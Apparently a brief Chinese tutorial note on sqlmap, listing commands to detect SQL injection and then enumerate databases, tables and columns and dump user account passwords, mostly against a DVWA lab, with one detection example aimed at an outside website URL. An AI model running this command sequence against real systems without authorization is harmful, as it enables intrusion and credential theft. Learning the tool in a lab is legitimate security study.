sqlmap学习网址:https://freeerror.org/d/186-sql-cookie-boolean-based-blind
首先打开sqlmap所安装的文件夹,然后按shift键后,点击鼠标右键,打开cmd模式;
sqlmap 命令
python sqlmap.py --version //查看版本信息
python sqlmap.py -h //查询帮助
基本命令
1、探测是否存在漏洞
.\sqlmap.py -u "http://www.510cms.net/news.php?cid=1&listid=&newsid=27"
kali使用sqlmap步骤
1、检测注入点
sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1"
2、列出数据库
sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" --dbs
3、列出指定数据库中的表
sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dvwa --tables
4、列出指定表中的列
sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dwwa -T users --columns
5、dump出指定列中的数据字段,及帐号密码
sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dvwa -T users --columns --dump